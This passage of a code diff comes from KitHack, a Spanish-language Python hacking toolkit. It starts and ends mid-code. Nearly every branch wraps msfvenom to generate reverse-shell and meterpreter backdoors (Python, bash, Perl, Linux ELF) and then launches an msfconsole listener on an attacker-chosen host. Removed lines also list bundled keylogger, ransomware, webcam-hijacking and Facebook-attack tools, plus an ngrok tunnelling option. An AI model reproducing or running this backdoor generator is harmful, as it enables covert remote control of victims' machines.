output/{2}.py" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.py".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "03": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.py".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "04": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.py".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "05": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p python/shell_reverse_tcp LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.py".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "06": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p python/shell_reverse_tcp_ssl LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.py".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_tcp_ssl; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "07": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p python/shell_reverse_udp LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.py".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/shell_reverse_udp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif sys == "07": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} cmd/unix/reverse_bash".format(WHITE, YELLOW)) + print("{0}[02]{1} cmd/unix/reverse_bash_telnet_ssl".format( + WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash LHOST={0} LPORT={1} -f raw > output/{2}.sh" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.sh".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash_telnet_ssl LHOST={0} LPORT={1} -f raw > output/{2}.sh" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.sh".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif sys == "08": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} cmd/unix/reverse_perl".format(WHITE, YELLOW)) + print("{0}[02]{1} cmd/unix/reverse_perl_ssl".format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl LHOST={0} LPORT={1} -f raw > output/{2}.pl" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.pl".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl_ssl LHOST={0} LPORT={1} -f raw > output/{2}.pl" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.pl".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif sys == "09": + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + PAYLOAD = input("\n{0}SET PAYLOAD: {1}".format(YELLOW, DEFAULT)) + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {}; set LPORT {}; set PAYLOAD {}; exploit\'"' + .format(LHOST, LPORT, PAYLOAD)) + pause( + "\n{}Presione cualquier tecla para continuar...".format(GREEN)) + os.system("clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + os.system("clear") + main() + + elif option == "11": + webbrowser.open("https://adrmxr.github.io/KitHack", + new=1, + autoraise=True) + os.system("clear") + main() + + elif option == "12": + pause("\n{}Presione cualquier tecla para salir...".format(GREEN)) + time.sleep(1) + os.system("clear") + print(exit_main) + exit(0) + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + os.system("clear") + main() - tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - tool = tool.zfill(2) - - if tool == '00': - os.system('clear') - main() - - elif tool == '01': - kitools.TheFatRat() - - elif tool == '02': - kitools.Msfpc() - - elif tool == '03': - kitools.Fcrackzip() - - elif tool == '04': - kitools.QRLjacker() - - elif tool == '05': - kitools.Lazy() - - elif tool == '06': - kitools.HTBINVITE() - - elif tool == '07': - kitools.Ngrok() - - elif tool == '08': - kitools.Bluepot() - - elif tool == '09': - kitools.Setoolkit() - - elif tool == '10': - kitools.A2sv() - - elif tool == '11': - kitools.Fornonimizer() - - elif tool == '12': - kitools.Easysploit() - - elif tool == '13': - kitools.NXcrypt() - - elif tool == '14': - kitools.KnockMail() - - elif tool == '15': - kitools.RkHunter() - - elif tool == '16': - kitools.HeraKeylogger() - - elif tool == '17': - kitools.ZLogger() - - elif tool == '18': - kitools.Xerosploit() - - elif tool == '19': - kitools.Slacksec() - - elif tool == '20': - kitools.Katana() - - elif tool == '21': - kitools.Z0172CKTools() - - elif tool == '22': - kitools.CamHack() - - elif tool == '23': - kitools.Onex() - - elif tool == '24': - kitools.Ransom0() - - elif tool == '25': - kitools.Morpheus() - - elif tool == '26': - kitools.FBTOOL() - - elif tool == '27': - kitools.Venom() - - else: - print("\n{}[X] OPCION INVALIDA".format(RED)) - time.sleep(1.5) - os.system('clear') - main() - - elif option == '10': - # sys msfvenom - os.system('clear') - print(msf_banner) - print ('\n{0} [*] {1}Sys Payloads:\n'.format(DEFAULT, GREEN)) - print ('{0}[01] {1}LINUX {0}--> {2}Kithack.elf'.format(WHITE, YELLOW, RED)) - print ('{0}[02] {1}WINDOWS {0}--> {2}Kithack.exe'.format(WHITE, YELLOW, RED)) - print ('{0}[03] {1}ANDROID {0}--> {2}Kithack.apk'.format(WHITE, YELLOW, RED)) - print ('{0}[04] {1}MAC OS {0}--> {2}Kithack.macho'.format(WHITE, YELLOW, RED)) - print ('{0}[05] {1}PHP {0}--> {2}Kithack.php'.format(WHITE, YELLOW, RED)) - print ('{0}[06] {1}PYTHON {0}--> {2}Kithack.py'.format(WHITE, YELLOW, RED)) - print ('{0}[07] {1}BASH {0}--> {2}Kithack.sh'.format(WHITE, YELLOW, RED)) - print ('{0}[08] {1}PERL {0}--> {2}Kithack.pl'.format(WHITE, YELLOW, RED)) - print ('{0}[09] {1}RUN MSFCONSOLE {0}'.format(WHITE, YELLOW)) - print ('{0} [0] {1}Back'.format(WHITE, YELLOW)) - - sys = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - sys = sys.zfill(2) - - if sys == '00': - os.system('clear') - main() - - elif sys == '01': - print ('{0}\n[*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} linux/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[02]{1} linux/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[03]{1} linux/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[04]{1} linux/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[05]{1} linux/x64/shell_bind_tcp'.format(WHITE, YELLOW)) - print ('{0}[06]{1} linux/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[07]{1} linux/x86/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[08]{1} linux/x86/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[09]{1} linux/x86/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[10]{1} linux/x86/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[11]{1} linux/x86/shell_bind_tcp'.format(WHITE, YELLOW)) - print ('{0}[12]{1} linux/x86/shell_reverse_tcp'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '03': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '04': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f elf > output/{2}.elf'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.elf'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x64/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '05': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - 